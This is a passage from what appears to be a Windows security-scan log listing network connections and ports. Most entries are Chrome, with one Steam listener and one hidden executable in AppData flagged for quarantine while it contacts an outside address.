53572TIME_WAIT142.250.190.33443  [0]
x64   
53575TIME_WAIT142.250.191.162443  [0]
x64   
53577TIME_WAIT142.250.191.225443  [0]
x64   
53579TIME_WAIT142.250.190.68443  [0]
x64   
53582TIME_WAIT142.250.191.225443  [0]
x64   
53585TIME_WAIT142.250.191.162443  [0]
x64   
53586TIME_WAIT52.116.53.150443  [0]
x64   
53587TIME_WAIT142.250.191.162443  [0]
x64   
53592TIME_WAIT142.250.190.98443  [0]
x64   
53595TIME_WAIT34.117.26.124443  [0]
x64   
53598TIME_WAIT159.127.43.10443  [0]
x64   
53599TIME_WAIT142.250.190.98443  [0]
x64   
53601TIME_WAIT35.201.101.243443  [0]
x64   
53608TIME_WAIT142.250.190.5443  [0]
x64   
53614TIME_WAIT199.127.204.171443  [0]
x64   
53616TIME_WAIT3.135.132.32443  [0]
x64   
53617TIME_WAIT44.207.72.204443  [0]
x64   
53619TIME_WAIT35.201.101.243443  [0]
x64   
53620TIME_WAIT35.201.101.243443  [0]
x64   
53621TIME_WAIT199.127.204.142443  [0]
x64   
53626TIME_WAIT159.127.43.10443  [0]
x64   
53627TIME_WAIT159.127.43.10443  [0]
x64   
53628TIME_WAIT108.157.142.52443  [0]
x64   
53629TIME_WAIT159.127.43.10443  [0]
x64   
53631SYN_SENT79.137.195.20580c:\users\isaac\appdata\roaming\kkgac.bat.exe [16056]
411.00 kb, rSaH, created: 23.07.2023 02:12:17, modified: 07.05.2022 00:20:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Windows PowerShell© Microsoft Corporation. All rights reserved.
53632TIME_WAIT159.127.43.10443  [0]
x64   
53634TIME_WAIT159.127.43.10443  [0]
x64   
53635TIME_WAIT104.16.242.229443  [0]
x64   
53638ESTABLISHED151.101.1.108443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53643ESTABLISHED104.90.23.83443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53644ESTABLISHED108.157.148.226443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53645ESTABLISHED108.157.142.84443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53646ESTABLISHED108.157.142.84443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53647ESTABLISHED35.71.139.29443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53648ESTABLISHED23.32.129.152443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53649ESTABLISHED23.32.128.201443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53650ESTABLISHED23.55.126.89443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53651ESTABLISHED23.212.73.148443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53652ESTABLISHED104.18.11.47443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53653ESTABLISHED142.250.190.38443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53655ESTABLISHED68.67.160.24443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53656ESTABLISHED52.223.40.198443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53657ESTABLISHED35.211.178.172443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53658ESTABLISHED204.79.197.200443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53659ESTABLISHED70.42.32.127443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53660ESTABLISHED3.214.207.4443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53661ESTABLISHED13.107.42.14443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53662ESTABLISHED74.119.119.149443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53663ESTABLISHED108.157.142.16443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53664ESTABLISHED104.22.55.232443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53665ESTABLISHED99.84.171.224443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53666ESTABLISHED99.84.171.224443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53668ESTABLISHED108.157.142.63443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53669ESTABLISHED104.26.3.70443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53670ESTABLISHED23.32.129.152443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53671ESTABLISHED3.227.190.204443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53672ESTABLISHED108.157.150.17443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53673ESTABLISHED146.75.78.132443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53675ESTABLISHED108.157.142.99443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53676ESTABLISHED108.157.142.16443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53677ESTABLISHED64.74.236.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53678ESTABLISHED50.31.142.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53679ESTABLISHED141.148.8.2443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53680ESTABLISHED108.157.150.90443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53681ESTABLISHED108.157.142.29443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53682ESTABLISHED64.74.236.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53683ESTABLISHED64.74.236.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53684ESTABLISHED50.31.142.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53685ESTABLISHED64.74.236.223443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53686ESTABLISHED107.23.55.247443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53687ESTABLISHED35.190.60.146443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53688ESTABLISHED52.55.144.0443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53689ESTABLISHED108.157.150.111443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53690ESTABLISHED52.46.143.56443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53691ESTABLISHED54.159.116.102443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53693ESTABLISHED3.231.49.235443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53694ESTABLISHED108.157.142.90443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53695ESTABLISHED69.173.151.98443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53696ESTABLISHED104.36.115.111443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53697ESTABLISHED34.237.206.66443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53698ESTABLISHED54.84.99.145443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53699ESTABLISHED68.67.160.186443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53700ESTABLISHED172.217.4.74443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53701ESTABLISHED108.157.142.49443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53702ESTABLISHED172.217.4.74443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53703ESTABLISHED172.217.0.161443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53704ESTABLISHED108.157.150.90443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53705ESTABLISHED172.217.0.170443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53707ESTABLISHED172.217.2.38443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53708ESTABLISHED142.250.191.138443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53710ESTABLISHED52.116.53.150443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53713ESTABLISHED198.54.12.145443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53714ESTABLISHED198.54.12.145443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53715ESTABLISHED34.233.167.114443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53716ESTABLISHED142.250.190.2443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53717ESTABLISHED172.217.4.195443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53720ESTABLISHED172.217.4.195443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53721ESTABLISHED34.236.174.186443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53722ESTABLISHED142.250.190.98443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53723ESTABLISHED23.32.129.152443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53724ESTABLISHED142.250.191.162443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53725ESTABLISHED216.239.32.3443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
UDP ports
5353LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [23516]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
5353LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [23516]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
27036LISTENING----c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
49339LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
49460LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
49666LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50042LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50189LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50264LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50452LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50725LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
50843LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
51180LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
51431LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
51699LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
51820LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52167LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52321LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52715LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52953LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52956LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53522LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53613LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
